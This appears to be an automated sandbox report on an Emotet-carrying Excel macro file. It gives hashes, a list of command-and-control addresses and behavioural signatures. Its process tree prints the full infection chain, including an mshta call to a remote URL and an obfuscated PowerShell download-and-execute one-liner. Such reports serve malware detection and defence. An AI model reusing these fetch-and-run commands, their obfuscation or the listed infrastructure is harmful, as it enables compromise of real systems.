Analysis
-
max time kernel
151s -
max time network
145s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
18-01-2022 20:09
Behavioral task
behavioral1
Sample
c80a32c49ac7bde59c31966abd4db02186a8fa1cb19f389a95c909243a438e70.xlsm
Resource
win10-en-20211208
General
-
Target
c80a32c49ac7bde59c31966abd4db02186a8fa1cb19f389a95c909243a438e70.xlsm
-
Size
112KB
-
MD5
aa9024b6219f678650836159f61ef986
-
SHA1
8074a6282469e5ae5d231a5835bd4afc722762e4
-
SHA256
c80a32c49ac7bde59c31966abd4db02186a8fa1cb19f389a95c909243a438e70
-
SHA512
22f39f495ffd1624810101620046a81df874b3f81c37b7b3c9f98e5378f40098b4bd446960da28d09aba87a4588ba43c967a7e5af2485af289fb7be7ea8220ce
Malware Config
Extracted
http://92.255.57.195/ru/ru.html
Extracted
http://92.255.57.195/ru/ru.png
Extracted
emotet
Epoch5
45.138.98.34:80
69.16.218.101:8080
51.210.242.234:8080
185.148.168.220:8080
142.4.219.173:8080
54.38.242.185:443
191.252.103.16:80
104.131.62.48:8080
62.171.178.147:8080
217.182.143.207:443
168.197.250.14:80
37.44.244.177:8080
66.42.57.149:443
210.57.209.142:8080
159.69.237.188:443
116.124.128.206:8080
128.199.192.135:8080
195.154.146.35:443
185.148.168.15:8080
195.77.239.39:8080
207.148.81.119:8080
85.214.67.203:8080
190.90.233.66:443
78.46.73.125:443
78.47.204.80:443
37.59.209.141:8080
54.37.228.122:443
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 616 2520 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 6 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 37 2112 mshta.exe 40 1908 powershell.exe 42 1908 powershell.exe 47 524 rundll32.exe 48 524 rundll32.exe 49 524 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 1768 rundll32.exe 1252 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Zbuohsrnkam\vndbajbuofi.jfa rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2172 2112 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2520 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exeWerFault.exerundll32.exepid process 1908 powershell.exe 1908 powershell.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 1908 powershell.exe 524 rundll32.exe 524 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 2172 WerFault.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
Processes:
EXCEL.EXEpid process 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE 2520 EXCEL.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
EXCEL.EXEcmd.exemshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 2520 wrote to memory of 616 2520 EXCEL.EXE cmd.exe PID 2520 wrote to memory of 616 2520 EXCEL.EXE cmd.exe PID 616 wrote to memory of 2112 616 cmd.exe mshta.exe PID 616 wrote to memory of 2112 616 cmd.exe mshta.exe PID 2112 wrote to memory of 1908 2112 mshta.exe powershell.exe PID 2112 wrote to memory of 1908 2112 mshta.exe powershell.exe PID 1908 wrote to memory of 2408 1908 powershell.exe cmd.exe PID 1908 wrote to memory of 2408 1908 powershell.exe cmd.exe PID 2408 wrote to memory of 1768 2408 cmd.exe rundll32.exe PID 2408 wrote to memory of 1768 2408 cmd.exe rundll32.exe PID 2408 wrote to memory of 1768 2408 cmd.exe rundll32.exe PID 1768 wrote to memory of 1252 1768 rundll32.exe rundll32.exe PID 1768 wrote to memory of 1252 1768 rundll32.exe rundll32.exe PID 1768 wrote to memory of 1252 1768 rundll32.exe rundll32.exe PID 1252 wrote to memory of 3768 1252 rundll32.exe rundll32.exe PID 1252 wrote to memory of 3768 1252 rundll32.exe rundll32.exe PID 1252 wrote to memory of 3768 1252 rundll32.exe rundll32.exe PID 3768 wrote to memory of 524 3768 rundll32.exe rundll32.exe PID 3768 wrote to memory of 524 3768 rundll32.exe rundll32.exe PID 3768 wrote to memory of 524 3768 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c80a32c49ac7bde59c31966abd4db02186a8fa1cb19f389a95c909243a438e70.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/92.255.57.195/ru/ru.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\system32\mshta.exemshta http://92.255.57.195/ru/ru.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/ru/ru.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zbuohsrnkam\vndbajbuofi.jfa",rnDzMDR8⤵
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Zbuohsrnkam\vndbajbuofi.jfa",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:524
-
-
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2112 -s 22564⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
4fe97ff29d19fb8f5948eafa0bd55445
SHA16943ca24424868ff127f1f6b425df04ebb11ba48
SHA256c10bb4445adb8dec3454009e5f5d12854f86111c1b8a700a96c833d60b05a6c3
SHA5122ab0c9b9d714f2014eb1e8a3460622143f4a25ab92111d6cf57512383e0033342174b16156bcab847066a589ecf85aa795a81933f2d903cdcae9bfbf651d3987
-
MD5
4fe97ff29d19fb8f5948eafa0bd55445
SHA16943ca24424868ff127f1f6b425df04ebb11ba48
SHA256c10bb4445adb8dec3454009e5f5d12854f86111c1b8a700a96c833d60b05a6c3
SHA5122ab0c9b9d714f2014eb1e8a3460622143f4a25ab92111d6cf57512383e0033342174b16156bcab847066a589ecf85aa795a81933f2d903cdcae9bfbf651d3987
-
MD5
4fe97ff29d19fb8f5948eafa0bd55445
SHA16943ca24424868ff127f1f6b425df04ebb11ba48
SHA256c10bb4445adb8dec3454009e5f5d12854f86111c1b8a700a96c833d60b05a6c3
SHA5122ab0c9b9d714f2014eb1e8a3460622143f4a25ab92111d6cf57512383e0033342174b16156bcab847066a589ecf85aa795a81933f2d903cdcae9bfbf651d3987